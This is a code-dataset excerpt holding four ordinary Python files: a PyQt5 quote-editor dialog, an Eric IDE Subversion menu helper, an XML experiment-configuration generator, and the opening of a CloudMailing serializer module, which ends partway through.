repo_name
stringlengths 5
92
| path
stringlengths 4
221
| copies
stringclasses 19
values | size
stringlengths 4
6
| content
stringlengths 766
896k
| license
stringclasses 15
values | hash
int64 -9,223,277,421,539,062,000
9,223,102,107B
| line_mean
float64 6.51
99.9
| line_max
int64 32
997
| alpha_frac
float64 0.25
0.96
| autogenerated
bool 1
class | ratio
float64 1.5
13.6
| config_test
bool 2
classes | has_no_keywords
bool 2
classes | few_assignments
bool 1
class |
|---|---|---|---|---|---|---|---|---|---|---|---|---|---|---|
ax333l/QuoteBook
|
QuoteBook/editordialog.py
|
1
|
4837
|
# -*- coding: utf-8 -*-
# Form implementation generated from reading ui file 'editordialog.ui'
#
# Created by: PyQt5 UI code generator 5.9.2
#
# WARNING! All changes made in this file will be lost!
from PyQt5 import QtCore, QtGui, QtWidgets
class Ui_Editor(object):
def setupUi(self, Editor):
Editor.setObjectName("Editor")
Editor.resize(400, 349)
icon = QtGui.QIcon()
icon.addPixmap(QtGui.QPixmap("./icon.ico"), QtGui.QIcon.Normal, QtGui.QIcon.Off)
Editor.setWindowIcon(icon)
Editor.setLocale(QtCore.QLocale(QtCore.QLocale.English, QtCore.QLocale.UnitedStates))
self.gridLayout = QtWidgets.QGridLayout(Editor)
self.gridLayout.setObjectName("gridLayout")
self.editCategory = QtWidgets.QLineEdit(Editor)
self.editCategory.setObjectName("editCategory")
self.gridLayout.addWidget(self.editCategory, 2, 1, 1, 1)
self.editTitle = QtWidgets.QLineEdit(Editor)
self.editTitle.setObjectName("editTitle")
self.gridLayout.addWidget(self.editTitle, 1, 1, 1, 1)
self.editQuote = QtWidgets.QTextEdit(Editor)
self.editQuote.setObjectName("editQuote")
self.gridLayout.addWidget(self.editQuote, 0, 1, 1, 1)
self.editAuthor = QtWidgets.QLineEdit(Editor)
self.editAuthor.setObjectName("editAuthor")
self.gridLayout.addWidget(self.editAuthor, 3, 1, 1, 1)
self.label = QtWidgets.QLabel(Editor)
self.label.setObjectName("label")
self.gridLayout.addWidget(self.label, 0, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.horizontalLayout_6 = QtWidgets.QHBoxLayout()
self.horizontalLayout_6.setObjectName("horizontalLayout_6")
self.btnSave = QtWidgets.QPushButton(Editor)
self.btnSave.setObjectName("btnSave")
self.horizontalLayout_6.addWidget(self.btnSave)
self.btnCancel = QtWidgets.QPushButton(Editor)
self.btnCancel.setObjectName("btnCancel")
self.horizontalLayout_6.addWidget(self.btnCancel)
self.gridLayout.addLayout(self.horizontalLayout_6, 7, 1, 1, 1)
self.label_2 = QtWidgets.QLabel(Editor)
self.label_2.setObjectName("label_2")
self.gridLayout.addWidget(self.label_2, 1, 0, 1, 1, QtCore.Qt.AlignHCenter)
spacerItem = QtWidgets.QSpacerItem(40, 20, QtWidgets.QSizePolicy.Expanding, QtWidgets.QSizePolicy.Minimum)
self.gridLayout.addItem(spacerItem, 7, 0, 1, 1)
self.editCharacters = QtWidgets.QLineEdit(Editor)
self.editCharacters.setObjectName("editCharacters")
self.gridLayout.addWidget(self.editCharacters, 4, 1, 1, 1)
self.editDate = QtWidgets.QLineEdit(Editor)
self.editDate.setObjectName("editDate")
self.gridLayout.addWidget(self.editDate, 5, 1, 1, 1)
self.editTags = QtWidgets.QLineEdit(Editor)
self.editTags.setObjectName("editTags")
self.gridLayout.addWidget(self.editTags, 6, 1, 1, 1)
self.label_3 = QtWidgets.QLabel(Editor)
self.label_3.setObjectName("label_3")
self.gridLayout.addWidget(self.label_3, 2, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_4 = QtWidgets.QLabel(Editor)
self.label_4.setObjectName("label_4")
self.gridLayout.addWidget(self.label_4, 3, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_5 = QtWidgets.QLabel(Editor)
self.label_5.setObjectName("label_5")
self.gridLayout.addWidget(self.label_5, 4, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_6 = QtWidgets.QLabel(Editor)
self.label_6.setObjectName("label_6")
self.gridLayout.addWidget(self.label_6, 5, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.label_7 = QtWidgets.QLabel(Editor)
self.label_7.setObjectName("label_7")
self.gridLayout.addWidget(self.label_7, 6, 0, 1, 1, QtCore.Qt.AlignHCenter)
self.retranslateUi(Editor)
QtCore.QMetaObject.connectSlotsByName(Editor)
def retranslateUi(self, Editor):
_translate = QtCore.QCoreApplication.translate
Editor.setWindowTitle(_translate("Editor", "QuoteEdit"))
self.label.setText(_translate("Editor", "Quote"))
self.btnSave.setText(_translate("Editor", "Save"))
self.btnCancel.setText(_translate("Editor", "Cancel"))
self.label_2.setText(_translate("Editor", "Title"))
self.label_3.setText(_translate("Editor", "Category"))
self.label_4.setText(_translate("Editor", "Author"))
self.label_5.setText(_translate("Editor", "Characters"))
self.label_6.setText(_translate("Editor", "Date"))
self.label_7.setText(_translate("Editor", "Tags"))
if __name__ == "__main__":
import sys
app = QtWidgets.QApplication(sys.argv)
Editor = QtWidgets.QDialog()
ui = Ui_Editor()
ui.setupUi(Editor)
Editor.show()
sys.exit(app.exec_())
|
gpl-3.0
| 1,446,403,713,159,849,200
| 47.37
| 114
| 0.674385
| false
| 3.698012
| false
| false
| false
|
paulmadore/Eric-IDE
|
6-6.0.9/eric/Plugins/VcsPlugins/vcsPySvn/ProjectHelper.py
|
1
|
24920
|
# -*- coding: utf-8 -*-
# Copyright (c) 2005 - 2015 Detlev Offenbach <detlev@die-offenbachs.de>
#
"""
Module implementing the VCS project helper for Subversion.
"""
from __future__ import unicode_literals
import os
from E5Gui.E5Application import e5App
from VCS.ProjectHelper import VcsProjectHelper
from E5Gui.E5Action import E5Action
import UI.PixmapCache
class SvnProjectHelper(VcsProjectHelper):
"""
Class implementing the VCS project helper for Subversion.
"""
def __init__(self, vcsObject, projectObject, parent=None, name=None):
"""
Constructor
@param vcsObject reference to the vcs object
@param projectObject reference to the project object
@param parent parent widget (QWidget)
@param name name of this object (string)
"""
VcsProjectHelper.__init__(self, vcsObject, projectObject, parent, name)
def getActions(self):
"""
Public method to get a list of all actions.
@return list of all actions (list of E5Action)
"""
return self.actions[:]
def initActions(self):
"""
Public method to generate the action objects.
"""
self.vcsNewAct = E5Action(
self.tr('New from repository'),
UI.PixmapCache.getIcon("vcsCheckout.png"),
self.tr('&New from repository...'), 0, 0, self,
'subversion_new')
self.vcsNewAct.setStatusTip(self.tr(
'Create a new project from the VCS repository'
))
self.vcsNewAct.setWhatsThis(self.tr(
"""<b>New from repository</b>"""
"""<p>This creates a new local project from the VCS"""
""" repository.</p>"""
))
self.vcsNewAct.triggered.connect(self._vcsCheckout)
self.actions.append(self.vcsNewAct)
self.vcsUpdateAct = E5Action(
self.tr('Update from repository'),
UI.PixmapCache.getIcon("vcsUpdate.png"),
self.tr('&Update from repository'), 0, 0, self,
'subversion_update')
self.vcsUpdateAct.setStatusTip(self.tr(
'Update the local project from the VCS repository'
))
self.vcsUpdateAct.setWhatsThis(self.tr(
"""<b>Update from repository</b>"""
"""<p>This updates the local project from the VCS"""
""" repository.</p>"""
))
self.vcsUpdateAct.triggered.connect(self._vcsUpdate)
self.actions.append(self.vcsUpdateAct)
self.vcsCommitAct = E5Action(
self.tr('Commit changes to repository'),
UI.PixmapCache.getIcon("vcsCommit.png"),
self.tr('&Commit changes to repository...'), 0, 0, self,
'subversion_commit')
self.vcsCommitAct.setStatusTip(self.tr(
'Commit changes to the local project to the VCS repository'
))
self.vcsCommitAct.setWhatsThis(self.tr(
"""<b>Commit changes to repository</b>"""
"""<p>This commits changes to the local project to the VCS"""
""" repository.</p>"""
))
self.vcsCommitAct.triggered.connect(self._vcsCommit)
self.actions.append(self.vcsCommitAct)
self.vcsLogAct = E5Action(
self.tr('Show log'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show &log'),
0, 0, self, 'subversion_log')
self.vcsLogAct.setStatusTip(self.tr(
'Show the log of the local project'
))
self.vcsLogAct.setWhatsThis(self.tr(
"""<b>Show log</b>"""
"""<p>This shows the log of the local project.</p>"""
))
self.vcsLogAct.triggered.connect(self._vcsLog)
self.actions.append(self.vcsLogAct)
self.svnLogBrowserAct = E5Action(
self.tr('Show log browser'),
UI.PixmapCache.getIcon("vcsLog.png"),
self.tr('Show log browser'),
0, 0, self, 'subversion_log_browser')
self.svnLogBrowserAct.setStatusTip(self.tr(
'Show a dialog to browse the log of the local project'
))
self.svnLogBrowserAct.setWhatsThis(self.tr(
"""<b>Show log browser</b>"""
"""<p>This shows a dialog to browse the log of the local"""
""" project. A limited number of entries is shown first. More"""
""" can be retrieved later on.</p>"""
))
self.svnLogBrowserAct.triggered.connect(self._vcsLogBrowser)
self.actions.append(self.svnLogBrowserAct)
self.vcsDiffAct = E5Action(
self.tr('Show differences'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show &difference'),
0, 0, self, 'subversion_diff')
self.vcsDiffAct.setStatusTip(self.tr(
'Show the difference of the local project to the repository'
))
self.vcsDiffAct.setWhatsThis(self.tr(
"""<b>Show differences</b>"""
"""<p>This shows differences of the local project to the"""
""" repository.</p>"""
))
self.vcsDiffAct.triggered.connect(self._vcsDiff)
self.actions.append(self.vcsDiffAct)
self.svnExtDiffAct = E5Action(
self.tr('Show differences (extended)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (extended)'),
0, 0, self, 'subversion_extendeddiff')
self.svnExtDiffAct.setStatusTip(self.tr(
'Show the difference of revisions of the project to the repository'
))
self.svnExtDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (extended)</b>"""
"""<p>This shows differences of selectable revisions of"""
""" the project.</p>"""
))
self.svnExtDiffAct.triggered.connect(self.__svnExtendedDiff)
self.actions.append(self.svnExtDiffAct)
self.svnUrlDiffAct = E5Action(
self.tr('Show differences (URLs)'),
UI.PixmapCache.getIcon("vcsDiff.png"),
self.tr('Show differences (URLs)'),
0, 0, self, 'subversion_urldiff')
self.svnUrlDiffAct.setStatusTip(self.tr(
'Show the difference of the project between two repository URLs'
))
self.svnUrlDiffAct.setWhatsThis(self.tr(
"""<b>Show differences (URLs)</b>"""
"""<p>This shows differences of the project between"""
""" two repository URLs.</p>"""
))
self.svnUrlDiffAct.triggered.connect(self.__svnUrlDiff)
self.actions.append(self.svnUrlDiffAct)
self.vcsStatusAct = E5Action(
self.tr('Show status'),
UI.PixmapCache.getIcon("vcsStatus.png"),
self.tr('Show &status'),
0, 0, self, 'subversion_status')
self.vcsStatusAct.setStatusTip(self.tr(
'Show the status of the local project'
))
self.vcsStatusAct.setWhatsThis(self.tr(
"""<b>Show status</b>"""
"""<p>This shows the status of the local project.</p>"""
))
self.vcsStatusAct.triggered.connect(self._vcsStatus)
self.actions.append(self.vcsStatusAct)
self.svnChangeListsAct = E5Action(
self.tr('Show change lists'),
UI.PixmapCache.getIcon("vcsChangeLists.png"),
self.tr('Show change lists'),
0, 0, self, 'subversion_changelists')
self.svnChangeListsAct.setStatusTip(self.tr(
'Show the change lists and associated files of the local project'
))
self.svnChangeListsAct.setWhatsThis(self.tr(
"""<b>Show change lists</b>"""
"""<p>This shows the change lists and associated files of the"""
""" local project.</p>"""
))
self.svnChangeListsAct.triggered.connect(self.__svnChangeLists)
self.actions.append(self.svnChangeListsAct)
self.svnRepoInfoAct = E5Action(
self.tr('Show repository info'),
UI.PixmapCache.getIcon("vcsRepo.png"),
self.tr('Show repository info'),
0, 0, self, 'subversion_repoinfo')
self.svnRepoInfoAct.setStatusTip(self.tr(
'Show some repository related information for the local project'
))
self.svnRepoInfoAct.setWhatsThis(self.tr(
"""<b>Show repository info</b>"""
"""<p>This shows some repository related information for"""
""" the local project.</p>"""
))
self.svnRepoInfoAct.triggered.connect(self.__svnInfo)
self.actions.append(self.svnRepoInfoAct)
self.vcsTagAct = E5Action(
self.tr('Tag in repository'),
UI.PixmapCache.getIcon("vcsTag.png"),
self.tr('&Tag in repository...'),
0, 0, self, 'subversion_tag')
self.vcsTagAct.setStatusTip(self.tr(
'Tag the local project in the repository'
))
self.vcsTagAct.setWhatsThis(self.tr(
"""<b>Tag in repository</b>"""
"""<p>This tags the local project in the repository.</p>"""
))
self.vcsTagAct.triggered.connect(self._vcsTag)
self.actions.append(self.vcsTagAct)
self.vcsExportAct = E5Action(
self.tr('Export from repository'),
UI.PixmapCache.getIcon("vcsExport.png"),
self.tr('&Export from repository...'),
0, 0, self, 'subversion_export')
self.vcsExportAct.setStatusTip(self.tr(
'Export a project from the repository'
))
self.vcsExportAct.setWhatsThis(self.tr(
"""<b>Export from repository</b>"""
"""<p>This exports a project from the repository.</p>"""
))
self.vcsExportAct.triggered.connect(self._vcsExport)
self.actions.append(self.vcsExportAct)
self.vcsPropsAct = E5Action(
self.tr('Command options'),
self.tr('Command &options...'), 0, 0, self,
'subversion_options')
self.vcsPropsAct.setStatusTip(self.tr(
'Show the VCS command options'))
self.vcsPropsAct.setWhatsThis(self.tr(
"""<b>Command options...</b>"""
"""<p>This shows a dialog to edit the VCS command options.</p>"""
))
self.vcsPropsAct.triggered.connect(self._vcsCommandOptions)
self.actions.append(self.vcsPropsAct)
self.vcsRevertAct = E5Action(
self.tr('Revert changes'),
UI.PixmapCache.getIcon("vcsRevert.png"),
self.tr('Re&vert changes'),
0, 0, self, 'subversion_revert')
self.vcsRevertAct.setStatusTip(self.tr(
'Revert all changes made to the local project'
))
self.vcsRevertAct.setWhatsThis(self.tr(
"""<b>Revert changes</b>"""
"""<p>This reverts all changes made to the local project.</p>"""
))
self.vcsRevertAct.triggered.connect(self._vcsRevert)
self.actions.append(self.vcsRevertAct)
self.vcsMergeAct = E5Action(
self.tr('Merge'),
UI.PixmapCache.getIcon("vcsMerge.png"),
self.tr('Mer&ge changes...'),
0, 0, self, 'subversion_merge')
self.vcsMergeAct.setStatusTip(self.tr(
'Merge changes of a tag/revision into the local project'
))
self.vcsMergeAct.setWhatsThis(self.tr(
"""<b>Merge</b>"""
"""<p>This merges changes of a tag/revision into the local"""
""" project.</p>"""
))
self.vcsMergeAct.triggered.connect(self._vcsMerge)
self.actions.append(self.vcsMergeAct)
self.vcsSwitchAct = E5Action(
self.tr('Switch'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('S&witch...'),
0, 0, self, 'subversion_switch')
self.vcsSwitchAct.setStatusTip(self.tr(
'Switch the local copy to another tag/branch'
))
self.vcsSwitchAct.setWhatsThis(self.tr(
"""<b>Switch</b>"""
"""<p>This switches the local copy to another tag/branch.</p>"""
))
self.vcsSwitchAct.triggered.connect(self._vcsSwitch)
self.actions.append(self.vcsSwitchAct)
self.vcsResolveAct = E5Action(
self.tr('Conflicts resolved'),
self.tr('Con&flicts resolved'),
0, 0, self, 'subversion_resolve')
self.vcsResolveAct.setStatusTip(self.tr(
'Mark all conflicts of the local project as resolved'
))
self.vcsResolveAct.setWhatsThis(self.tr(
"""<b>Conflicts resolved</b>"""
"""<p>This marks all conflicts of the local project as"""
""" resolved.</p>"""
))
self.vcsResolveAct.triggered.connect(self.__svnResolve)
self.actions.append(self.vcsResolveAct)
self.vcsCleanupAct = E5Action(
self.tr('Cleanup'),
self.tr('Cleanu&p'),
0, 0, self, 'subversion_cleanup')
self.vcsCleanupAct.setStatusTip(self.tr(
'Cleanup the local project'
))
self.vcsCleanupAct.setWhatsThis(self.tr(
"""<b>Cleanup</b>"""
"""<p>This performs a cleanup of the local project.</p>"""
))
self.vcsCleanupAct.triggered.connect(self._vcsCleanup)
self.actions.append(self.vcsCleanupAct)
self.vcsCommandAct = E5Action(
self.tr('Execute command'),
self.tr('E&xecute command...'),
0, 0, self, 'subversion_command')
self.vcsCommandAct.setStatusTip(self.tr(
'Execute an arbitrary VCS command'
))
self.vcsCommandAct.setWhatsThis(self.tr(
"""<b>Execute command</b>"""
"""<p>This opens a dialog to enter an arbitrary VCS command.</p>"""
))
self.vcsCommandAct.triggered.connect(self._vcsCommand)
self.actions.append(self.vcsCommandAct)
self.svnTagListAct = E5Action(
self.tr('List tags'),
self.tr('List tags...'),
0, 0, self, 'subversion_list_tags')
self.svnTagListAct.setStatusTip(self.tr(
'List tags of the project'
))
self.svnTagListAct.setWhatsThis(self.tr(
"""<b>List tags</b>"""
"""<p>This lists the tags of the project.</p>"""
))
self.svnTagListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnTagListAct)
self.svnBranchListAct = E5Action(
self.tr('List branches'),
self.tr('List branches...'),
0, 0, self, 'subversion_list_branches')
self.svnBranchListAct.setStatusTip(self.tr(
'List branches of the project'
))
self.svnBranchListAct.setWhatsThis(self.tr(
"""<b>List branches</b>"""
"""<p>This lists the branches of the project.</p>"""
))
self.svnBranchListAct.triggered.connect(self.__svnBranchList)
self.actions.append(self.svnBranchListAct)
self.svnListAct = E5Action(
self.tr('List repository contents'),
self.tr('List repository contents...'),
0, 0, self, 'subversion_contents')
self.svnListAct.setStatusTip(self.tr(
'Lists the contents of the repository'
))
self.svnListAct.setWhatsThis(self.tr(
"""<b>List repository contents</b>"""
"""<p>This lists the contents of the repository.</p>"""
))
self.svnListAct.triggered.connect(self.__svnTagList)
self.actions.append(self.svnListAct)
self.svnPropSetAct = E5Action(
self.tr('Set Property'),
self.tr('Set Property...'),
0, 0, self, 'subversion_property_set')
self.svnPropSetAct.setStatusTip(self.tr(
'Set a property for the project files'
))
self.svnPropSetAct.setWhatsThis(self.tr(
"""<b>Set Property</b>"""
"""<p>This sets a property for the project files.</p>"""
))
self.svnPropSetAct.triggered.connect(self.__svnPropSet)
self.actions.append(self.svnPropSetAct)
self.svnPropListAct = E5Action(
self.tr('List Properties'),
self.tr('List Properties...'),
0, 0, self, 'subversion_property_list')
self.svnPropListAct.setStatusTip(self.tr(
'List properties of the project files'
))
self.svnPropListAct.setWhatsThis(self.tr(
"""<b>List Properties</b>"""
"""<p>This lists the properties of the project files.</p>"""
))
self.svnPropListAct.triggered.connect(self.__svnPropList)
self.actions.append(self.svnPropListAct)
self.svnPropDelAct = E5Action(
self.tr('Delete Property'),
self.tr('Delete Property...'),
0, 0, self, 'subversion_property_delete')
self.svnPropDelAct.setStatusTip(self.tr(
'Delete a property for the project files'
))
self.svnPropDelAct.setWhatsThis(self.tr(
"""<b>Delete Property</b>"""
"""<p>This deletes a property for the project files.</p>"""
))
self.svnPropDelAct.triggered.connect(self.__svnPropDel)
self.actions.append(self.svnPropDelAct)
self.svnRelocateAct = E5Action(
self.tr('Relocate'),
UI.PixmapCache.getIcon("vcsSwitch.png"),
self.tr('Relocate...'),
0, 0, self, 'subversion_relocate')
self.svnRelocateAct.setStatusTip(self.tr(
'Relocate the working copy to a new repository URL'
))
self.svnRelocateAct.setWhatsThis(self.tr(
"""<b>Relocate</b>"""
"""<p>This relocates the working copy to a new repository"""
""" URL.</p>"""
))
self.svnRelocateAct.triggered.connect(self.__svnRelocate)
self.actions.append(self.svnRelocateAct)
self.svnRepoBrowserAct = E5Action(
self.tr('Repository Browser'),
UI.PixmapCache.getIcon("vcsRepoBrowser.png"),
self.tr('Repository Browser...'),
0, 0, self, 'subversion_repo_browser')
self.svnRepoBrowserAct.setStatusTip(self.tr(
'Show the Repository Browser dialog'
))
self.svnRepoBrowserAct.setWhatsThis(self.tr(
"""<b>Repository Browser</b>"""
"""<p>This shows the Repository Browser dialog.</p>"""
))
self.svnRepoBrowserAct.triggered.connect(self.__svnRepoBrowser)
self.actions.append(self.svnRepoBrowserAct)
self.svnConfigAct = E5Action(
self.tr('Configure'),
self.tr('Configure...'),
0, 0, self, 'subversion_configure')
self.svnConfigAct.setStatusTip(self.tr(
'Show the configuration dialog with the Subversion page selected'
))
self.svnConfigAct.setWhatsThis(self.tr(
"""<b>Configure</b>"""
"""<p>Show the configuration dialog with the Subversion page"""
""" selected.</p>"""
))
self.svnConfigAct.triggered.connect(self.__svnConfigure)
self.actions.append(self.svnConfigAct)
self.svnUpgradeAct = E5Action(
self.tr('Upgrade'),
self.tr('Upgrade...'),
0, 0, self, 'subversion_upgrade')
self.svnUpgradeAct.setStatusTip(self.tr(
'Upgrade the working copy to the current format'
))
self.svnUpgradeAct.setWhatsThis(self.tr(
"""<b>Upgrade</b>"""
"""<p>Upgrades the working copy to the current format.</p>"""
))
self.svnUpgradeAct.triggered.connect(self.__svnUpgrade)
self.actions.append(self.svnUpgradeAct)
def initMenu(self, menu):
"""
Public method to generate the VCS menu.
@param menu reference to the menu to be populated (QMenu)
"""
menu.clear()
act = menu.addAction(
UI.PixmapCache.getIcon(
os.path.join("VcsPlugins", "vcsPySvn", "icons", "pysvn.png")),
self.vcs.vcsName(), self._vcsInfoDisplay)
font = act.font()
font.setBold(True)
act.setFont(font)
menu.addSeparator()
menu.addAction(self.vcsUpdateAct)
menu.addAction(self.vcsCommitAct)
menu.addSeparator()
menu.addAction(self.vcsNewAct)
menu.addAction(self.vcsExportAct)
menu.addSeparator()
menu.addAction(self.vcsTagAct)
if self.vcs.otherData["standardLayout"]:
menu.addAction(self.svnTagListAct)
menu.addAction(self.svnBranchListAct)
else:
menu.addAction(self.svnListAct)
menu.addSeparator()
menu.addAction(self.vcsLogAct)
menu.addAction(self.svnLogBrowserAct)
menu.addSeparator()
menu.addAction(self.vcsStatusAct)
menu.addAction(self.svnChangeListsAct)
menu.addAction(self.svnRepoInfoAct)
menu.addSeparator()
menu.addAction(self.vcsDiffAct)
menu.addAction(self.svnExtDiffAct)
menu.addAction(self.svnUrlDiffAct)
menu.addSeparator()
menu.addAction(self.vcsRevertAct)
menu.addAction(self.vcsMergeAct)
menu.addAction(self.vcsResolveAct)
menu.addSeparator()
menu.addAction(self.vcsSwitchAct)
menu.addAction(self.svnRelocateAct)
menu.addSeparator()
menu.addAction(self.svnPropSetAct)
menu.addAction(self.svnPropListAct)
menu.addAction(self.svnPropDelAct)
menu.addSeparator()
menu.addAction(self.vcsCleanupAct)
menu.addSeparator()
menu.addAction(self.vcsCommandAct)
menu.addAction(self.svnRepoBrowserAct)
menu.addAction(self.svnUpgradeAct)
menu.addSeparator()
menu.addAction(self.vcsPropsAct)
menu.addSeparator()
menu.addAction(self.svnConfigAct)
def __svnResolve(self):
"""
Private slot used to resolve conflicts of the local project.
"""
self.vcs.svnResolve(self.project.ppath)
def __svnPropList(self):
"""
Private slot used to list the properties of the project files.
"""
self.vcs.svnListProps(self.project.ppath, True)
def __svnPropSet(self):
"""
Private slot used to set a property for the project files.
"""
self.vcs.svnSetProp(self.project.ppath, True)
def __svnPropDel(self):
"""
Private slot used to delete a property for the project files.
"""
self.vcs.svnDelProp(self.project.ppath, True)
def __svnTagList(self):
"""
Private slot used to list the tags of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, True)
def __svnBranchList(self):
"""
Private slot used to list the branches of the project.
"""
self.vcs.svnListTagBranch(self.project.ppath, False)
def __svnExtendedDiff(self):
"""
Private slot used to perform a svn diff with the selection of
revisions.
"""
self.vcs.svnExtendedDiff(self.project.ppath)
def __svnUrlDiff(self):
"""
Private slot used to perform a svn diff with the selection of
repository URLs.
"""
self.vcs.svnUrlDiff(self.project.ppath)
def __svnInfo(self):
"""
Private slot used to show repository information for the local project.
"""
self.vcs.svnInfo(self.project.ppath, ".")
def __svnRelocate(self):
"""
Private slot used to relocate the working copy to a new repository URL.
"""
self.vcs.svnRelocate(self.project.ppath)
def __svnRepoBrowser(self):
"""
Private slot to open the repository browser.
"""
self.vcs.svnRepoBrowser(projectPath=self.project.ppath)
def __svnConfigure(self):
"""
Private slot to open the configuration dialog.
"""
e5App().getObject("UserInterface")\
.showPreferences("zzz_subversionPage")
def __svnChangeLists(self):
"""
Private slot used to show a list of change lists.
"""
self.vcs.svnShowChangelists(self.project.ppath)
def __svnUpgrade(self):
"""
Private slot used to upgrade the working copy format.
"""
self.vcs.svnUpgrade(self.project.ppath)
|
gpl-3.0
| 8,645,574,378,206,538,000
| 37.45679
| 79
| 0.577127
| false
| 4.069236
| true
| false
| false
|
lpouillo/execo-g5k-tools
|
engines/simgrid_paasage/xml_gen_execo.py
|
1
|
5079
|
import xml.etree.cElementTree as ET # that 'c' in "...etree.cElement..."
# means the package is a C implementation; it runs 15-20 times faster
# than equivalent python implementation
import xml.dom.minidom as DOM
import shutil
import lxml.etree as le
import re
import itertools
from optparse import OptionParser
def initXML():
root = ET.Element("nTierApplication")
root.set("version", "1")
ami = ET.SubElement(root, "AMI")
field1 = ET.SubElement(ami, "webService")
field1.set("size", "10000000000.0")
field2 = ET.SubElement(ami, "appsService")
field2.set("size", "10000000000.0")
field3 = ET.SubElement(ami, "dbService")
field3.set("size", "10000000000.0")
field4 = ET.SubElement(ami, "webProxy")
field4.set("size", "10000000000.0")
field5 = ET.SubElement(ami, "appsProxy")
field5.set("size", "10000000000.0")
field6 = ET.SubElement(ami, "dbProxy")
field6.set("size", "10000000000.0")
proxy = ET.SubElement(root, "proxy")
field7 = ET.SubElement(proxy, "webProxy")
field7.set("region", "eu_1")
field7.set("instanceType","m1.small")
field8 = ET.SubElement(proxy, "appsProxy")
field8.set("region", "eu_1")
field8.set("instanceType","m1.small")
field9 = ET.SubElement(proxy, "dbProxy")
field9.set("region", "eu_1")
field9.set("instanceType","m1.small")
return root
def createService(parent, name):
tmp = ET.SubElement(parent, name)
return tmp
def createRegion(parent, name):
tmp = ET.SubElement(parent, "region")
tmp.set("name", name )
return tmp
def createInstance(parent, ty, qt):
tmp = ET.SubElement(parent, "instance")
tmp.set("quantity", qt )
tmp.set("type", ty )
return tmp
def generateExp(comb_str, lis, rootSrc):
root=initXML()
servParent=ET.SubElement(root, "services")
servWeb=createService(servParent,"webService")
servApp=createService(servParent,"appsService")
servDb=createService(servParent,"dbService")
i=0
web = rootSrc.find("webService")
if (web == None):
print "webService tag not found!"
exit(1)
for child1 in web.iter("region"):
regionTmp=createRegion(servWeb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servWeb.remove(regionTmp)
if(not servWeb.getchildren()):
print "ERROR: Web service does not has any vm instance associated for first experiment"
exit(2)
app=rootSrc.find("appsService")
if (app==None):
print "ERROR: appsService tag not found!"
exit(1)
for child1 in app.iter("region"):
regionTmp=createRegion(servApp, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servApp.remove(regionTmp)
if(not servApp.getchildren()):
print "ERROR: Apps Service does not has any vm instance associated for first experiment"
exit(2)
db=rootSrc.find("dbService")
if (db==None):
print "ERROR: dbService tag not found!"
exit(1)
for child1 in db.iter("region"):
regionTmp=createRegion(servDb, child1.get("name"))
for child2 in child1.iter("instance"):
if (lis[child2.get("type")] != '0'):
createInstance(regionTmp, child2.get("type"), lis[child2.get("type")])
else:
continue
if not regionTmp.getchildren():
servDb.remove(regionTmp)
if(not servDb.getchildren()):
print "ERROR: Db service does not has any vm instance associated for first experiment"
exit(2)
xml_string=ET.tostring(root, encoding='utf8', method='xml')
xml = DOM.parseString(xml_string)
pretty_xml_as_string = xml.toprettyxml()
outFile=open("exp_"+comb_str+".xml", "w")
outFile.write(pretty_xml_as_string)
def create_dict(comb_list):
res_dict=dict()
length=len(comb_list)-1
for i in drange(0,length,2):
res_dict[comb_list[i]]=comb_list[i+1]
return res_dict
def drange(start, stop, step):
r = start
while r < stop:
yield r
r += step
if __name__ == "__main__":
tree = ET.parse("conf.xml")
rootSrc = tree.getroot()
usage = "usage: %prog [options] [args] "
parser = OptionParser(usage=usage)
parser.add_option("--cb", dest="comb", help="current combination")
(options, args) = parser.parse_args()
if not (options.comb):
parser.error("You must provide parameters for the experiment !")
param_dict=create_dict(options.comb.split("_"))
generateExp(options.comb, param_dict, rootSrc)
|
gpl-3.0
| -9,222,059,549,375,971,000
| 28.52907
| 100
| 0.617051
| false
| 3.445726
| false
| false
| false
|
ricard33/cloud-mailing
|
cloud_mailing/master/serializers.py
|
1
|
11463
|
# Copyright 2015-2019 Cedric RICARD
#
# This file is part of CloudMailing.
#
# CloudMailing is free software: you can redistribute it and/or modify
# it under the terms of the GNU Affero General Public License as published by
# the Free Software Foundation, either version 3 of the License, or
# (at your option) any later version.
#
# CloudMailing is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU Affero General Public License for more details.
#
# You should have received a copy of the GNU Affero General Public License
# along with CloudMailing. If not, see <http://www.gnu.org/licenses/>.
import email
import email.parser
import email.policy
import logging
import re
from datetime import timedelta, datetime
import dateutil.parser
import txmongo.filter
from twisted.internet import defer
from ..common.encoding import force_text
from .api_common import compute_hourly_stats
from ..common.db_common import get_db
from . import models
from ..common import settings
from ..common.rest_api_common import NotFound
__author__ = 'Cedric RICARD'
log = logging.getLogger('api')
class Serializer(object):
"""
Base class to serialize/unserialize objects to/from json or XMLRPC `struct` format
"""
fields = []
model_class = None
id_field = '_id'
def __init__(self, instance=None, data=None, fields_filter=None, many=False):
self._collection = self.model_class and get_db()[self.model_class._get_name()] or None
self._instance = instance
self._data = data
self._fields_filter = fields_filter or []
if fields_filter == 'total':
self._fields_filter = ['.total']
elif fields_filter == 'none':
self._fields_filter = []
elif fields_filter == 'default_with_total':
self._fields_filter = self.fields + ('.total',)
elif fields_filter == 'default' or fields_filter is None:
self._fields_filter = self.fields
# elif not isinstance(fields_filter, (list, tuple)):
# raise ValueError("Bad value for 'fields_filter' (was '%s')" % fields_filter)
else:
self._fields_filter = fields_filter or []
self._many = many
@property
def filtered_fields(self):
return list(set(self.fields) & set(self._fields_filter))
def make_filter(self, args):
